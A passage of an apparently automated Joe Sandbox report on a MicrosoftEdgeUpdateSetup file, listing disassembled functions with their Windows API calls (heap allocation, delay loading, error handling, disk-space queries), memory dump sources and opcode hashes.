                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: abf37f45336d3a7e932f9aa362cadfdc71b7bbada6f22e0f4e98cddc6c2a225b
                                        • Instruction ID: 808976fd21cdc822b1bac6ee5f57e1f8245d5319a271079e26b87fa3a0bef1e2
                                        • Opcode Fuzzy Hash: abf37f45336d3a7e932f9aa362cadfdc71b7bbada6f22e0f4e98cddc6c2a225b
                                        • Instruction Fuzzy Hash: AEF0BEB23082253BE510164D8C46F7BB2ACDBA1BA4B10031EB635D72D0CE901F1182F4
                                        Function 001709E3 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 451 1709e3-1709ef 452 170a21-170a2c call 16ecd3 451->452 453 1709f1-1709f3 451->453 460 170a2e-170a30 452->460 455 1709f5-1709f6 453->455 456 170a0c-170a1d RtlAllocateHeap 453->456 455->456 457 170a1f 456->457 458 1709f8-1709ff call 16bce9 456->458 457->460 458->452 463 170a01-170a0a call 171752 458->463 463->452 463->456
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,0016FAF6,00000220,?,?,?,?,?,?,0016C529,?), ref: 00170A15
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 0eed18c9015a7bfd76a7dc141d022726e4aa7e7c3c86e0dde1e827df1b3ff272
                                        • Instruction ID: 47e37d1505472d2f99b0918213fb2eaf514625526c671b25f24fd1c0f4b1970a
                                        • Opcode Fuzzy Hash: 0eed18c9015a7bfd76a7dc141d022726e4aa7e7c3c86e0dde1e827df1b3ff272
                                        • Instruction Fuzzy Hash: C5E09B35558335E6EA2367A55C0479B7678EF993A0F158130FC1DD71D1DBA1DC8082E1
                                        Function 0017B8CF Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0017B978: RtlAcquireSRWLockExclusive.NTDLL ref: 0017B995
                                        • DloadProtectSection.DELAYIMP ref: 0017B8F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AcquireDloadExclusiveLockProtectSection
                                        • String ID:
                                        • API String ID: 3680172570-0
                                        • Opcode ID: 3f24287d04d601a53c00751503d2c0a2b8df98a6786e8742f230af90f065221b
                                        • Instruction ID: 5f8d6d4fece5e755b887525634595c79c9ae249eb718ce8e2ae2ed5500c96fe7
                                        • Opcode Fuzzy Hash: 3f24287d04d601a53c00751503d2c0a2b8df98a6786e8742f230af90f065221b
                                        • Instruction Fuzzy Hash: C3D0A97010C20299C308B752ACC630422B0F700300F60C000FF18824E1C7A48280AB12
                                        Function 0017B853 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cd088959a016bf3b0ad2a9969b9c940762c62d50e4ff6fbcf0cbedcd291739aa
                                        • Instruction ID: 87d7a22287be90f3b6f5428bac5dd7fd841ca4382cb22f5e2955a7ce072d0d54
                                        • Opcode Fuzzy Hash: cd088959a016bf3b0ad2a9969b9c940762c62d50e4ff6fbcf0cbedcd291739aa
                                        • Instruction Fuzzy Hash: 24B0128D26C002BD330831002D83F3A032CC7C1B50330C02FF804D00449F400D460632
                                        Function 0017B878 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: dac12824b61d2199194a2bc61f7c01d037e62b7037945846b3c80aab013eca47
                                        • Instruction ID: e926d815905995dcf55650adaa3eff3ea856bd211ab89c8af16cedc856b667c8
                                        • Opcode Fuzzy Hash: dac12824b61d2199194a2bc61f7c01d037e62b7037945846b3c80aab013eca47
                                        • Instruction Fuzzy Hash: 4EB0928926C002AD230861042982E3A022CC6C1B10330C01AB808C1044DB4009460632
                                        Function 0017B86E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8d5c2d9ffe13eebf5087c3b05482ec4ea0bea4dc49f8c891c6abe39afa4e3ae5
                                        • Instruction ID: 0147ccd699fa9ecd2f42e9c4acdb858ee96471f9d511aa587ee036f785890034
                                        • Opcode Fuzzy Hash: 8d5c2d9ffe13eebf5087c3b05482ec4ea0bea4dc49f8c891c6abe39afa4e3ae5
                                        • Instruction Fuzzy Hash: 91B0128D26C102AD331871046D83F3A026CC6C1B10330C11FF808C1044DF400D8A1732
                                        Function 0017B896 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 06256f5f4a4dddf2c2a672e4d8414d44947f44f1393a9f19fb8b978276162d50
                                        • Instruction ID: 4c2aae41d6ba72fb2f23dfd76f3afe550d4af0b42e9b2a60d56b5814eac0f02f
                                        • Opcode Fuzzy Hash: 06256f5f4a4dddf2c2a672e4d8414d44947f44f1393a9f19fb8b978276162d50
                                        • Instruction Fuzzy Hash: 27B0128D2AC002AD334871042E83F3A022CC6C1B10330C01FF808C5044DF400D470732
                                        Function 0017B882 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 703663feba5b0b90b76c488d038875eb9155462f0d21318481ed10d37a439071
                                        • Instruction ID: 6b54ad4019450e049c33e321188e57aadeee494383dc548a20fa846d57b8ebbf
                                        • Opcode Fuzzy Hash: 703663feba5b0b90b76c488d038875eb9155462f0d21318481ed10d37a439071
                                        • Instruction Fuzzy Hash: 85B0128D26C002AD331871042D83F3A022CD6C1B20330C41FF808C1084DF400D051732
                                        Function 0017B88C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0017B865
                                          • Part of subcall function 0017BB71: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017BBE4
                                          • Part of subcall function 0017BB71: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017BBF5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 6771d1b1cb87bd6b3be3a24ee839270c37469faf79cb078da5c0eca0350afb0a
                                        • Instruction ID: 0846067b37ecbf1b422fa236e1d8905187bb269cc2008c1d0065b6ff138d09c9
                                        • Opcode Fuzzy Hash: 6771d1b1cb87bd6b3be3a24ee839270c37469faf79cb078da5c0eca0350afb0a
                                        • Instruction Fuzzy Hash: 9AB0128D2AC402ED335871046E83F3A022DC6C1B20330C01FF808C5054DF400D061732
                                        Function 00161240 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 00161251
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: 1e1ceb063482cd169f6a51625371c98646d57113c1ce22c43811fc23a4e9a2df
                                        • Instruction ID: 68aa6ea125f12888b3fe42d847b6eaab13f9b3ff062cb119cde79078125f9061
                                        • Opcode Fuzzy Hash: 1e1ceb063482cd169f6a51625371c98646d57113c1ce22c43811fc23a4e9a2df
                                        • Instruction Fuzzy Hash: 77C01231040208FACB010B40DC09BE47B68AB00301F64C028B60C084A0C37294E0DAC4
                                        Function 00161220 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0016122B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 3971e048a83fd4129646765b30eea6932350c3e914976ad6a06e1b6a350ddbcf
                                        • Instruction ID: eddaa7d76bb8b1091bd3f521ed0da16f42811fee007c851e1ddd4542312c7076
                                        • Opcode Fuzzy Hash: 3971e048a83fd4129646765b30eea6932350c3e914976ad6a06e1b6a350ddbcf
                                        • Instruction Fuzzy Hash: 2AB09236040208FBDA011B91ED06F85BF29EB15750F108025F70C084618773A4A1AAD8

                                        Non-executed Functions

                                        Function 00175308 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 899d385ea11bce632db66bca2fa08627566b0d2e2b934d2406f31803b062d0ee
                                        • Instruction ID: f9e04ee84285c9fcda674df8535f9d5c43809ea6c5a00cdad270262a8a378a37
                                        • Opcode Fuzzy Hash: 899d385ea11bce632db66bca2fa08627566b0d2e2b934d2406f31803b062d0ee
                                        • Instruction Fuzzy Hash: 21D24C71E04A288FDB65CF28DD407EAB7B6EB48345F1585EAD40EE7240E774AE818F41
                                        Function 00163E83 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,00000000,80040750), ref: 00163EA2
                                        • SetLastError.KERNEL32(00000000), ref: 00163EAD
                                        • FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,00000000,00000000,?), ref: 00163EC3
                                        • GetLastError.KERNEL32 ref: 00163ECD
                                        • SetLastError.KERNEL32(?), ref: 00163EDE
                                        • LocalFree.KERNEL32(00000000), ref: 00163F9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FormatFreeLocalMessage
                                        • String ID:
                                        • API String ID: 2740663437-0
                                        • Opcode ID: a33591d1ba8ff6988806024912cefabb82e19398d79463ab2f1935adb834ced5
                                        • Instruction ID: 197d7f39a3dfae459dacee12e37da8e30b0ed69e4be3066e515aa91b44751b92
                                        • Opcode Fuzzy Hash: a33591d1ba8ff6988806024912cefabb82e19398d79463ab2f1935adb834ced5
                                        • Instruction Fuzzy Hash: F031E171E00205EFDB08AF64CC49ABEB7B9EF94300F1041ADE41297282DB71AF54CBA1
                                        Function 0016876F Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0016877B
                                        • IsDebuggerPresent.KERNEL32 ref: 00168847
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00168867
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00168871
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 76fd7a183efbfb41cfc2febe734f01bdc626411e95ccc6c338930dab67344f00
                                        • Instruction ID: 3eace74bc664b021e7b077a84d3989b16c910eed2a4cb5d8795598c42c7b8291
                                        • Opcode Fuzzy Hash: 76fd7a183efbfb41cfc2febe734f01bdc626411e95ccc6c338930dab67344f00
                                        • Instruction Fuzzy Hash: B93118B5D05218DBDB11DFA4DD897CDBBB8AF18704F1041AAE40CAB250EB705A84CF45
                                        Function 0017B9B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0017B9C8
                                        • GetSystemInfo.KERNEL32(?), ref: 0017B9E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 1e118716a73c372f9796d5ad0e029f5afeffaa4126e40b7888db6143b89dd9cc
                                        • Instruction ID: ac9b28f8dcf155f49ef49a2f1ad1c9c963b65b4ecb32bdccbdcada9b868d4631
                                        • Opcode Fuzzy Hash: 1e118716a73c372f9796d5ad0e029f5afeffaa4126e40b7888db6143b89dd9cc
                                        • Instruction Fuzzy Hash: D301F7726041096BDB14DE69CC45BED7BBAAFC4324F0CC125ED5DD7140EB34D8418690
                                        Function 0016EA6A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0016EB62
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0016EB6C
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0016EB79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 38e0a1fe878e0ea4b4a26f9edfd826a049617a452409e8d8829657bb3ab7cd54
                                        • Instruction ID: 09573edea9258c6afd7cb3ed4a612e4b94cea52e830eed2206f35de02c61bb7a
                                        • Opcode Fuzzy Hash: 38e0a1fe878e0ea4b4a26f9edfd826a049617a452409e8d8829657bb3ab7cd54
                                        • Instruction Fuzzy Hash: 5031B374911228ABCB21DF64DC8979DBBB8AF18710F5042EAE40CA6251EB709BD5CF44
                                        Function 0016132B Relevance: 4.6, APIs: 3, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?,001616A1), ref: 00161377
                                        • __Init_thread_footer.LIBCMT ref: 001613A4
                                          • Part of subcall function 00179616: EnterCriticalSection.KERNEL32(00187388,00000000,?,?,00161363,001873E8,00000000,?,001616A1), ref: 00179621
                                          • Part of subcall function 00179616: LeaveCriticalSection.KERNEL32(00187388,?,?,00161363,001873E8,00000000,?,001616A1), ref: 0017965E
                                        • __Init_thread_footer.LIBCMT ref: 00161405
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
                                        • String ID:
                                        • API String ID: 3363689876-0
                                        • Opcode ID: 8b1cdbfc480a6e3e3631103498283c31b6736bbf546619d23535a9bfaaf74776
                                        • Instruction ID: b17efa76a09a82508c065170c4b95c8b29d6e7f99a0395c1a80834405798ca52
                                        • Opcode Fuzzy Hash: 8b1cdbfc480a6e3e3631103498283c31b6736bbf546619d23535a9bfaaf74776
                                        • Instruction Fuzzy Hash: 3211BB72908700DBC311AB28ED857893BA0B700725F388A19ED6496EE1CB70D6C4AF56
                                        Function 00161F55 Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetKnownFolderPath.SHELL32(0018134C,00000000,00000000,?,?,?,00161AA0), ref: 00161F76
                                        • GetDiskFreeSpaceExW.KERNEL32(?,00000000,00000000,00161AA0,?,?,00161AA0), ref: 00161F8D
                                        • CoTaskMemFree.OLE32(?,?,?,00161AA0), ref: 00161FA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1830473634.0000000000161000.00000020.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                                        • Associated: 00000000.00000002.1830455805.0000000000160000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830517518.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830534883.0000000000186000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1830548982.0000000000189000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_160000_MicrosoftEdgeUpdateSetup.jbxd
                                        Similarity
                                        • API ID: Free$DiskFolderKnownPathSpaceTask
                                        • String ID:
                                        • API String ID: 4143811264-0
                                        • Opcode ID: 6a6b38603cd208e03c5323a181645c5f00dc5f216d17f8a6eba2e549a785353a
                                        • Instruction ID: afe2b9f115ff9f3cb8305b00de2acbcf812eb9d0022d9bcfefee6f762ae0ae9c
                                        • Opcode Fuzzy Hash: 6a6b38603cd208e03c5323a181645c5f00dc5f216d17f8a6eba2e549a785353a
